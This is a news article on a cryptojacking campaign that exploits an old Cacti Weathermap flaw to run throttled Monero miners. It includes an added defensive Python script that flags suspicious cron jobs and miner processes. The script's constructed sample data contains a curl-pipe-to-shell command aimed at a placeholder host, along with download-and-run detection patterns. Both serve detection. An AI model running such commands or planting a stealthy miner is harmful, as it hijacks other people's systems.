‘Cryptojackers’ Exploit Years-Old Vulnerability in Linux Servers to Mine Monero $XMR

Cryptocurrency mining has become quite a lucrative venture for miners in recent times. While many miners operate legitimately, investing in the equipment required to mine successfully, some bad actors in the crypto space prefer to cryptojack other people's systems to mine cryptocurrencies.

Hackers are now using a nearly five-year-old vulnerability to infect Linux servers and mine the privacy-centric Monero altcoin.

According to the US-based internet security company Trend Micro, hackers are exploiting a vulnerability in the Network Weathermap plugin for Cacti.

The vulnerability the hackers are taking advantage of is tracked as CVE-2013-2618. The flaw allows the cyber criminals to execute code on the underlying servers.

Once they can execute code, they go ahead and install the legitimate Monero mining software known as XMRig.

The researchers said that the Weathermap vulnerability gives the hackers enough time to carry out their illicit operations. The attackers check on the installed malware every three minutes to ascertain whether anyone might have shut down the computer.

Unlike other cryptojackers, who use up huge amounts of CPU resources to pursue their selfish goals, this new breed is much more clever.

To avoid being detected easily, they configure XMRig to run with the highest level of discretion. This way, the miner uses a minimal amount of system power, making it almost impossible to suspect the mining activity.
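Both behaviours described above leave traces a host owner can look for: a persistence mechanism that re-checks the miner on a short cycle, and an XMRig process deliberately held to a small CPU share. The following Python script is an added example, not code from the article or from Trend Micro, that scans constructed crontab and `ps` output for those two signs. It assumes the three-minute check-in is implemented as a cron job and that the miner is still recognisable by its binary name; the article states neither, and every sample line, path and pool hostname below is constructed.

```python
"""Flag cron entries and processes consistent with a quiet, self-checking miner.

Added example, not from the Trend Micro report or the article. Assumptions
(not stated in the article): the three-minute check-in is a cron job, and the
miner appears in a process listing under its own name. All sample data below
is constructed and contains no real indicators.
"""
import re

# Constructed crontab lines (not real IoCs).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/logrotate /etc/logrotate.conf
*/3 * * * * /tmp/.X11-unix/check.sh >/dev/null 2>&1
*/30 * * * * /usr/local/bin/backup.sh
* * * * * curl -s http://example.invalid/u.sh | sh
"""

# Constructed output in the shape of `ps -eo pid,pcpu,comm,args`.
SAMPLE_PS = """\
  PID %CPU COMMAND         COMMAND
    1  0.0 systemd         /sbin/init
  842  0.3 apache2         /usr/sbin/apache2 -k start
 1337  4.9 xmrig           /tmp/.X11-unix/xmrig -c /tmp/.X11-unix/c.json
 2001 97.2 stress          stress --cpu 4
"""

SUSPICIOUS_PATH = re.compile(r"/(tmp|dev/shm|var/tmp)/")
DOWNLOAD_AND_RUN = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b")
MINER_NAMES = re.compile(r"xmrig|minerd|cpuminer", re.IGNORECASE)


def cron_minute_interval(minute_field):
    """Return the run interval in minutes for a simple minute field, or None.

    Handles '*' (every minute) and '*/N'. Fixed minutes, lists and ranges
    return None: they are not the tight, beacon-like schedule of interest.
    """
    if minute_field == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else None


def suspicious_cron_entries(crontab_text, max_interval=5):
    """Return (line, reasons) for entries that look like a miner check-in."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)          # 5 schedule fields + command
        if len(parts) < 6:
            continue
        minute, command = parts[0], parts[5]
        reasons = []
        interval = cron_minute_interval(minute)
        if interval is not None and interval <= max_interval:
            reasons.append(f"runs every {interval} min")
        if SUSPICIOUS_PATH.search(command):
            reasons.append("command lives in a world-writable temp dir")
        if DOWNLOAD_AND_RUN.search(command):
            reasons.append("downloads and pipes to a shell")
        if MINER_NAMES.search(command):
            reasons.append("references a known miner binary")
        if reasons:
            findings.append((line, reasons))
    return findings


def suspicious_processes(ps_text, quiet_cpu_max=10.0):
    """Return (pid, comm, cpu, note) for miner-named processes.

    A miner sitting below quiet_cpu_max is labelled 'throttled miner', the
    low-and-slow profile the article describes.
    """
    findings = []
    for line in ps_text.splitlines()[1:]:   # skip the header row
        fields = line.split(None, 3)
        if len(fields) < 4:
            continue
        pid, pcpu, comm, args = fields
        if MINER_NAMES.search(comm) or MINER_NAMES.search(args):
            try:
                cpu = float(pcpu)
            except ValueError:
                continue
            note = "throttled miner" if cpu <= quiet_cpu_max else "miner"
            findings.append((int(pid), comm, cpu, note))
    return findings


if __name__ == "__main__":
    for entry, why in suspicious_cron_entries(SAMPLE_CRONTAB):
        print("cron:", entry, "->", "; ".join(why))
    for pid, comm, cpu, note in suspicious_processes(SAMPLE_PS):
        print(f"proc: pid={pid} {comm} cpu={cpu}% ({note})")
```

Name matching is the weakest of these checks, since a miner binary can be renamed; the cron heuristics (short interval, temp-directory paths, download-and-pipe-to-shell) hold up regardless of what the binary is called, and on a real host the two inputs would come from `crontab -l` for each user plus `/etc/cron.d` and from `ps -eo pid,pcpu,comm,args`.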

It might interest you to know that the patch for the flaw has reportedly been available online for five years, but some users are still unaware of this fact and may still be mining Monero for hackers without knowing it.

“It’s also a classic case of reused vulnerabilities, as it exploits a rather outdated security flaw whose patch has been available for nearly five years,” part of the report reads.

So far, the malware has mostly targeted public Linux x86-64 servers globally. Cases of the attack have been reported in countries such as Japan, India, Taiwan, China and the U.S.

The Trend Micro researchers have tracked the two Monero wallets that have been receiving the mined coins ever since. They estimate the total amount of Monero obtained from the operation at 320 XMR ($63,000).

Per the researchers, users of the Cacti Network Weathermap plugin should install the most up-to-date security software and keep their Cacti data off public servers.

“Data from Cacti should be properly kept internal to the environment. Having this data exposed represents a huge risk in terms of operational security. While this allows systems or network administrators to conveniently monitor their environments, it also does the same for threat actors,” the report concluded.
